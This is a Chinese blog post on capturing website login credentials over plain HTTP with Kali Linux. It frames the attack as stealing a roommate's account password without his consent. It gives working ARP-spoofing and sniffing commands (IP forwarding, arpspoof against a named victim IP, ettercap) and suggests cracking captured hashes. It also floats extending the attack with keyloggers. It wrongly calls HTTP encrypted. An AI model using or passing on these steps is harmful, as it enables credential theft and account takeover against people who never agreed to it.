利用Kali Linux获取http协议加密的账户密码

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/chenjie19950809/article/details/78607715

http百度解释是说它是超文本传输协议(HTTP,HyperText Transfer Protocol),是互联网上应用最为广泛的一种网络协议。所有的WWW文件都必须遵守这个标准。设计HTTP最初的目的是为了提供一种发布和接收HTML页面的方法。虽然我也学过计算机网络的课程并且成绩还不错,但是具体到某个协议,也不能说出个一二,大概知道它用在哪里就行了。


情景假设

寝室兄弟在用电脑登录某个网站,并且它是那个网站的会员,而那个网站有些资源一直是你想要下载的,跟他问了几次叫他把账号借你用,他就是不肯,这时,你就可以用我下面的方法,获取他的账号密码啦。


理论方法

用kali虚拟机对基友电脑实施IP流量转发,让他的电脑流量经过你的kali。


具体方法

1.设置转发机制,在kali中输入一下内容并回车。

echo 1 >proc/sys/net/ipv4/ip_forward

2.回显第一步转发确认,在kali中输入一下代码并回车。

cat /proc/sys/net/ipv4/ip_forward

回显“1”说明第一步开启流量转发已经成功运行

3.既然要让电脑乖乖的转发自己的流量,就要让他有一种你电脑就是他要去的假象,这一步要开启ARP欺骗。另启一个窗口,输入一下代码并回车。

arpspoof -i eth0 -t 192.168.1.112 192.168.1.1

这是ARP欺骗方法,之前写过。

4.再启一个窗口,输入一下内容并回车。

ettercap -Tq -i eth0

开始验证

1.打开浏览器,比如我打开了kali的一个论坛http://defcon.cn/,它的登录时http协议加密的。我使用的火狐浏览器,在网页URL处直接有个感叹号的锁,就说明这个网站使用的http协议

2.我在登录的名称密码都输入chenjie,看kali的效果。

kali直接将键盘录入的按键信息记录下来了哈哈哈

总结

1.经论坛说明和亲自测试,有时候kali显示的密码和账户是经hash加密后的16位数字,这只需要在网上找反编译的网站就可以反编译成明文账户密码啦,上个学期学的《密码学》课程有解释各种加密的基本流程,md5简单的加密可以算出来密文,要是反推还是要借助电脑的。
2.这个测试是在局域网中进行的,感觉也可以延伸到外网上,可能要借助msf强大的工具,是不是黑进别人电脑,使用键盘记录什么的工具会更有效呢,毕竟这个是用网络转发进行的,要是别人关闭了什么端口或服务是不是这个方法就不行了呢,以后学到再说吧。

展开阅读全文

没有更多推荐了,返回首页